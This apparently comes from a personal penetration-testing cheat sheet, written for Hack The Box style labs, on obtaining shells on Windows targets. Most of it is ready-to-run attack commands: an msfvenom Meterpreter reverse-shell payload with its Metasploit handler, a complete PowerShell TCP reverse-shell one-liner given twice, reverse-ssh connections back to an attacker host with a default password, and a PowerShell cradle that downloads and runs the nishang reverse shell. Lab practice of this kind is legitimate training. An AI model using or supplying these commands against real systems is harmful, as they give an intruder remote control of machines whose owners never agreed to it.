Shells

Normal Shells

Meterpreter

First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx

Then, in your attacker machine, run Metasploit and start a handler:

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LPORT 4444 
set LHOST 10.10.14.73 
run

Replace the port and IP address with your own ones, of course.

Interactive Powershell Reverse Shell

Caveat: stderr doesn't work!

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Full TTY Shells

Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.

Probably a good idea to switch to bash if using ZSH: 

exec bash --login

If your target machine doesn't have internet access, then you'll need to download the plugins first: 

pwncat --download-plugins

Listen on port 4444: 

pwncat -m windows -lp 4444

Then connect to the pwncat with either a powershell.exe or cmd.exe reverse shell: 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse SSH Shell

Features:

  • Full TTY shell

  • File sharing via SFTP

  • Port forwarding

Requirements:

  • At least Windows 7 or Windows server 2008 (Windows 10 for conpty, need workaround for lower windows versions for full TTY functionality)

  • Linux kernel version 2.6.23 and higher

Caveats:

  • SCP doesn't seem to work

  • SSH port forwarding doesn't seem to work

  • It hangs sometimes

Evades antivirus: Don't know

First run this on your machine:

./reverse-ssh -v -l :4444

Then the following on the victim machine (you can use the upx packed executable, use ssh-shellhost on older machines):

.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP

And finally on your machine:

ssh -p 8888 127.0.0.1

The default password is letmeinbrudipls

NB! If the target doesn't have conpty (pre-windows 10, build 17763), then you need the following workaround:

upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP

The shellhost.exe executable needs to be in the same directory. It's an executable from OpenSSH.

Rlwrap with nishang

Serve the script on your machine. Then download the nishang shell to memory:

powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');

Start a listener on SOME_PORT on the attacker machine. Use rlwrap as explained here (not tested).

Then run the reverse shell. 

Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT

Socat

I think socat can be used to make a decent reverse shell?

PreviousCLI TipsNextWindows Script Host

Last updated